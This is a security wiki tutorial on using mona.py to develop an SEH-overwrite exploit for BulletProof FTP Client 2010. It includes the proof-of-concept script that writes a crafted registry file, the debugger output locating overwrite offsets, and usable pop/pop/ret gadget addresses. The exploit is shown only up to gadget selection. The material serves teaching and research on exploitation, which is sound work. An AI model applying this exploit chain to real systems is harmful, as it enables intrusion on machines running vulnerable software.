Test

From Security Weekly Wiki


Getting Dirty With Mona : SEH Overwrite

Despite the title, this isn't something that will legally require opt-in if you are in the UK. This is a quick tutorial about Corelan's mona.py. This tool makes me very excited; even though it's been around for a while, I've only just found it! And as far as I can tell, no one here has posted anything about it. So I'm going to walk through some basic exploit development with mona.py on Immunity Debugger, using the following exploit POC: POC

First, we need to go to Corelan to download mona and follow the setup, which is honestly a drag-and-drop operation plus a few commands to get mona to write its log files correctly (without overwriting them).

Now, pretty much every class I've taken on exploit development has relied on Metasploit to generate patterns and find memory offsets in the stack, the registers and EIP. Mona makes this process simple. Let's take a look:


We tell mona to make us a pattern for the POC, in this case 552 bytes long:


!mona pc 552

Mona tells us:

Output generated by mona.py v2.0, rev 447 - Immunity Debugger
Corelan Team - https://www.corelan.be
OS : xp, release 5.1.2600
Process being debugged : _no_name (pid 0)
2013-10-17 16:25:27
Pattern of 552 bytes :
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3


We take that pattern, in which every 4-byte window is unique, and inject it into our POC like so:



# Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
# Version: 2010.75.0.76
# Date: 2012-03-11
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.bpftp.com/
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Import Reg -> Start App
#
# Python 2 script (print statements). It writes a .reg file whose
# LogFileName value carries the 552-byte pattern from "!mona pc 552".

file="poc.reg"

# the mona pattern replaces the original junk so offsets can be located
junk1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"

# registry file header, the Options key of the client, and the overlong value
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"
poc=poc + "\"LogFileName\"=\"" + junk1 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";



We execute our code; in this case the Python script creates poc.reg, and the POC header tells us what to do with it (import the .reg file into the registry, then start the app). We then go and open our BulletProof FTP client.

Look at that! Our pattern shows up in EAX and EBP. Great, so how does that help us?

I'm not sure. If I were looking at it normally, I would be looking for EIP; however, there are many ways to get our own code to execute. Let's ask mona!

We type in:

!mona findmsp

(alternatively, the offset of a single value can be found with !mona po <value>)

We get the following results:

[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x0012fa40 (length 552 bytes)
Stack pivot between 172 & 724 bytes needed to land in this pattern
Cyclic pattern (normal) found at 0x016657d8 (length 552 bytes)
EAX overwritten with normal pattern : 0x41366e41 (offset 408)
EBP (0x0012fbf4) points at offset 436 in normal pattern (length 116)
[+] Examining SEH chain
SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)
0x0012fa40 : Contains normal cyclic pattern at ESP+0xac (+172) : offset 0, length 552 (-> 0x0012fc67 : ESP+0x2d4)
[+] Examining stack (entire stack) - looking for pointers to cyclic pattern
Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)
0x0012da1c : Pointer into normal cyclic pattern at ESP-0x1f78 (-8056) : 0x0012fa68 : offset 40, length 512
0x0012eb3c : Pointer into normal cyclic pattern at ESP-0xe58 (-3672) : 0x0012fc24 : offset 484, length 68
0x0012eba4 : Pointer into normal cyclic pattern at ESP-0xdf0 (-3568) : 0x0012fc24 : offset 484, length 68
0x0012ebbc : Pointer into normal cyclic pattern at ESP-0xdd8 (-3544) : 0x0012fc24 : offset 484, length 68
0x0012f948 : Pointer into normal cyclic pattern at ESP-0x4c (-76) : 0x0012fa40 : offset 0, length 552
0x0012f954 : Pointer into normal cyclic pattern at ESP-0x40 (-64) : 0x0012fa40 : offset 0, length 552
0x0012f958 : Pointer into normal cyclic pattern at ESP-0x3c (-60) : 0x0012fbf4 : offset 436, length 116
0x0012f960 : Pointer into normal cyclic pattern at ESP-0x34 (-52) : 0x0012fa40 : offset 0, length 552
0x0012f99c : Pointer into normal cyclic pattern at ESP+0x8 (+8) : 0x0012fbf4 : offset 436, length 116
0x0012f9a0 : Pointer into normal cyclic pattern at ESP+0xc (+12) : 0x0012fbfc : offset 444, length 108
0x0012f9a8 : Pointer into normal cyclic pattern at ESP+0x14 (+20) : 0x0012fbf4 : offset 436, length 116
0x0012fa0c : Pointer into normal cyclic pattern at ESP+0x78 (+120) : 0x0012fb44 : offset 260, length 292
0x0012fcf8 : Pointer into normal cyclic pattern at ESP+0x364 (+868) : 0x016657d8 : offset 0, length 552

Wow, it took mona a couple of seconds to do that. It might have taken me a while to figure all that out.

In this particular instance, the following is interesting:

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data
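To show what mona just did with the numbers above, here is a small added example (my own code, not from the post or from mona.py) that builds the same cyclic pattern and looks up the EAX value and the SEH record from the findmsp output; the function names are my own choice.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
CYCLE_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes, then the pattern repeats


def pattern_create(length):
    """The Metasploit-style cyclic pattern Aa0Aa1Aa2... that !mona pc builds, cut to `length`."""
    if not 0 < length <= CYCLE_LEN:
        raise ValueError("length must be between 1 and %d" % CYCLE_LEN)
    units = []
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                units.append(up + lo + dg)
                if len(units) * 3 >= length:
                    return "".join(units)[:length]
    return "".join(units)[:length]


def pattern_offset(value, length=CYCLE_LEN):
    """Offset of a 32-bit value inside the pattern (what !mona po reports), or None.

    The value is taken as it was read from memory, so its little-endian bytes are
    searched first (0x41366e41 -> b"An6A"); the reversed order is a fallback for a
    value that was copied out big-endian by hand.
    """
    haystack = pattern_create(length).encode("ascii")
    for needle in (struct.pack("<I", value), struct.pack(">I", value)):
        idx = haystack.find(needle)
        if idx != -1:
            return idx
    return None


def seh_offsets(handler_value, length=CYCLE_LEN):
    """Offsets of the nSEH and handler fields of the overwritten SEH record, or None.

    A SEH record is nSEH followed by the handler pointer. The findmsp output shows
    0x7041396f ("o9Ap"), which sits at pattern offset 448; the nSEH field 4 bytes
    before it is at 444, the offset mona labels the record with.
    """
    handler = pattern_offset(handler_value, length)
    if handler is None:
        return None
    return {"nseh": handler - 4, "handler": handler}


if __name__ == "__main__":
    print("EAX 0x41366e41 is at pattern offset", pattern_offset(0x41366e41))  # 408, as mona said
    print("SEH record:", seh_offsets(0x7041396f))  # {'nseh': 444, 'handler': 448}
```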

Let's go look at that in the stack:



Alright, so this is an SEH overwrite exploit; let's ask mona what to do:

!mona seh

Our list of pop/pop/ret sequences (all of them inside bpftpclient.exe, which was built without SafeSEH, ASLR or rebasing):

0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0040f1d8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0040f33c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x004124b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0041e207 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0041e248 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0041fa2c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x004237b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0042467b : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x004246bf : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x004273f1 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0042ecb2 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x004329c3 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x004333fe : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x00433429 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x00434a20 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x00434b25 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0043a5a7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0043a9bd : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0043d1ca : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x0043d1f4 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
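As an added example (my own code, not part of the post or of mona.py), here is a small parser for the lines !mona seh prints; it reports, per module, how many pop/pop/ret sequences were found and whether SafeSEH, ASLR and rebasing were all absent, which is exactly what makes bpftpclient.exe usable here. Two lines are copied from the output above; the hardened.dll line, its version and its path are constructed to show the contrast.

```python
import re
from collections import defaultdict

# One gadget per line: "addr : instructions | flags {page prot} [module] ASLR: ...,
# Rebase: ..., SafeSEH: ..., OS: ..., version (path)". The flag list may be empty.
MONA_SEH_LINE = re.compile(
    r"^(?P<addr>0x[0-9a-fA-F]{8}) : (?P<insn>.+?) \|\s*(?P<flags>\S*)\s*"
    r"\{(?P<page>\w+)\} \[(?P<module>[^\]]+)\] ASLR: (?P<aslr>True|False), "
    r"Rebase: (?P<rebase>True|False), SafeSEH: (?P<safeseh>True|False), "
    r"OS: (?P<os>True|False), (?P<version>\S+) \((?P<path>.+)\)$"
)


def parse_seh_line(line):
    """Parse one "!mona seh" result line into a dict; None for headers and other text."""
    m = MONA_SEH_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    for key in ("aslr", "rebase", "safeseh", "os"):
        rec[key] = rec[key] == "True"
    rec["flags"] = rec["flags"].split(",") if rec["flags"] else []
    rec["addr"] = int(rec["addr"], 16)
    return rec


def summarise_modules(lines):
    """Per module: gadget count, path, and whether SafeSEH, ASLR and Rebase are all missing."""
    summary = defaultdict(lambda: {"gadgets": 0, "unprotected": False, "path": ""})
    for rec in filter(None, map(parse_seh_line, lines)):
        entry = summary[rec["module"]]
        entry["gadgets"] += 1
        entry["path"] = rec["path"]
        # a gadget only serves an SEH overwrite when the module opted out of all three
        entry["unprotected"] = not (rec["safeseh"] or rec["aslr"] or rec["rebase"])
    return dict(summary)


# Two lines copied from the post's "!mona seh" output plus one constructed line for a
# hypothetical module (hardened.dll, placeholder path) built with SafeSEH and ASLR.
SAMPLE_OUTPUT = [
    r"0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)",
    r"0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)",
    r"0x10001234 : pop esi # pop ebx # ret | {PAGE_EXECUTE_READ} [hardened.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: False, v1.0.0.0 (C:\placeholder\hardened.dll)",
    "[+] Results :",
]
```

Running summarise_modules(SAMPLE_OUTPUT) flags bpftpclient.exe as unprotected with two gadgets and leaves hardened.dll protected; the same check over a full mona log shows which of your own modules still ship without /SAFESEH and /DYNAMICBASE.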

Amazing stuff!!!

Stay tuned for some more exploit fun!!!